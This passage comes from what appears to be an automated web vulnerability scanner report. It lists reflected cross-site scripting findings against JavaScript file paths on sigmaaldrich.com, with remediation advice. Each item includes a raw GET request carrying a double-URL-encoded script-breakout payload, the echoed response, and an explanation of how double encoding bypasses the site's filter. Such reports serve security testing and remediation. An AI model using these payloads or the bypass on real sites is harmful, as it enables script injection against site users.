                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/controls.js2104b";alert(1)//c1d92a36425","E404") ;
   </script>
...[SNIP]...

1.506. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/fontsizer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3662%2522%253balert%25281%2529%252f%252fb78f9467503 was submitted in the REST URL parameter 1. This input was echoed as d3662";alert(1)//b78f9467503 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsd3662%2522%253balert%25281%2529%252f%252fb78f9467503/core/fontsizer.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:59 GMT
Connection: close
Set-Cookie: JSESSIONID=540c4c55-a298-1442-82a5-f5675e3bfe27;Path=/
Content-Length: 28924


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/jsd3662";alert(1)//b78f9467503/core/fontsizer.js","E404") ;
   </script>
...[SNIP]...

1.507. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/fontsizer.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4217%2522%253balert%25281%2529%252f%252f03e4eed2201 was submitted in the REST URL parameter 2. This input was echoed as b4217";alert(1)//03e4eed2201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/coreb4217%2522%253balert%25281%2529%252f%252f03e4eed2201/fontsizer.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:02 GMT
Connection: close
Set-Cookie: JSESSIONID=ce1ccbde-6ebf-2444-8408-855d8a3fac59;Path=/
Content-Length: 28924


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/coreb4217";alert(1)//03e4eed2201/fontsizer.js","E404") ;
   </script>
...[SNIP]...

1.508. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/fontsizer.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee23a%2522%253balert%25281%2529%252f%252fa2324c5a597 was submitted in the REST URL parameter 3. This input was echoed as ee23a";alert(1)//a2324c5a597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/core/fontsizer.jsee23a%2522%253balert%25281%2529%252f%252fa2324c5a597 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:05 GMT
Connection: close
Set-Cookie: JSESSIONID=9dad5344-0b03-bc4d-8d51-42e587371757;Path=/
Content-Length: 28924


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/core/fontsizer.jsee23a";alert(1)//a2324c5a597","E404") ;
   </script>
...[SNIP]...

1.509. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/scripts.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7ea3%2522%253balert%25281%2529%252f%252f2d31382d1e2 was submitted in the REST URL parameter 1. This input was echoed as b7ea3";alert(1)//2d31382d1e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsb7ea3%2522%253balert%25281%2529%252f%252f2d31382d1e2/core/scripts.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=87c53a14-b6d6-8642-82ac-a0c3a13dadee;Path=/
Content-Length: 28922


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/jsb7ea3";alert(1)//2d31382d1e2/core/scripts.js","E404") ;
   </script>
...[SNIP]...

1.510. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/scripts.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12e4b%2522%253balert%25281%2529%252f%252fa49b83495f6 was submitted in the REST URL parameter 2. This input was echoed as 12e4b";alert(1)//a49b83495f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/core12e4b%2522%253balert%25281%2529%252f%252fa49b83495f6/scripts.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=c8b0cacb-de18-d048-88b0-987aec8f2155;Path=/
Content-Length: 28922


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/core12e4b";alert(1)//a49b83495f6/scripts.js","E404") ;
   </script>
...[SNIP]...

1.511. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/scripts.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78bb9%2522%253balert%25281%2529%252f%252fb6b56e087ef was submitted in the REST URL parameter 3. This input was echoed as 78bb9";alert(1)//b6b56e087ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/core/scripts.js78bb9%2522%253balert%25281%2529%252f%252fb6b56e087ef HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:04 GMT
Connection: close
Set-Cookie: JSESSIONID=8311ce88-5db8-c64b-8b21-e51d1a11064c;Path=/
Content-Length: 28922


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/core/scripts.js78bb9";alert(1)//b6b56e087ef","E404") ;
   </script>
...[SNIP]...

1.512. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/validation.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a7b8%2522%253balert%25281%2529%252f%252f39f1ed159ac was submitted in the REST URL parameter 1. This input was echoed as 7a7b8";alert(1)//39f1ed159ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js7a7b8%2522%253balert%25281%2529%252f%252f39f1ed159ac/core/validation.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=cc408828-a448-f843-8358-4a510a6abbfe;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js7a7b8";alert(1)//39f1ed159ac/core/validation.js","E404") ;
   </script>
...[SNIP]...

1.513. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/validation.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 873e9%2522%253balert%25281%2529%252f%252fe6051b5e846 was submitted in the REST URL parameter 2. This input was echoed as 873e9";alert(1)//e6051b5e846 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/core873e9%2522%253balert%25281%2529%252f%252fe6051b5e846/validation.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=ccdbf2f1-0cc4-e243-8391-b0cec8a5b256;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/core873e9";alert(1)//e6051b5e846/validation.js","E404") ;
   </script>
...[SNIP]...

1.514. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/validation.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f83e%2522%253balert%25281%2529%252f%252f6b129e705e5 was submitted in the REST URL parameter 3. This input was echoed as 6f83e";alert(1)//6b129e705e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/core/validation.js6f83e%2522%253balert%25281%2529%252f%252f6b129e705e5 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:04 GMT
Connection: close
Set-Cookie: JSESSIONID=6912a03a-a711-2d45-8565-5c21d86b9a49;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/core/validation.js6f83e";alert(1)//6b129e705e5","E404") ;
   </script>
...[SNIP]...

1.515. http://www.sigmaaldrich.com/js/effects.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/effects.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ade5%2522%253balert%25281%2529%252f%252f22b1f9faaf0 was submitted in the REST URL parameter 1. This input was echoed as 4ade5";alert(1)//22b1f9faaf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js4ade5%2522%253balert%25281%2529%252f%252f22b1f9faaf0/effects.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=2e94d126-e84a-5442-8236-015d6ded3e9e;Path=/
Content-Length: 28917


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js4ade5";alert(1)//22b1f9faaf0/effects.js","E404") ;
   </script>
...[SNIP]...

1.516. http://www.sigmaaldrich.com/js/effects.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/effects.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c80c%2522%253balert%25281%2529%252f%252fe22f4f15946 was submitted in the REST URL parameter 2. This input was echoed as 1c80c";alert(1)//e22f4f15946 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/effects.js1c80c%2522%253balert%25281%2529%252f%252fe22f4f15946 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=fba874d7-ffe0-f248-88e2-bf4063cea3f4;Path=/
Content-Length: 28917


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/effects.js1c80c";alert(1)//e22f4f15946","E404") ;
   </script>
...[SNIP]...

1.517. http://www.sigmaaldrich.com/js/globallinks.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/globallinks.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 926ac%2522%253balert%25281%2529%252f%252f7b2eb5a00c3 was submitted in the REST URL parameter 1. This input was echoed as 926ac";alert(1)//7b2eb5a00c3 in the application's response.

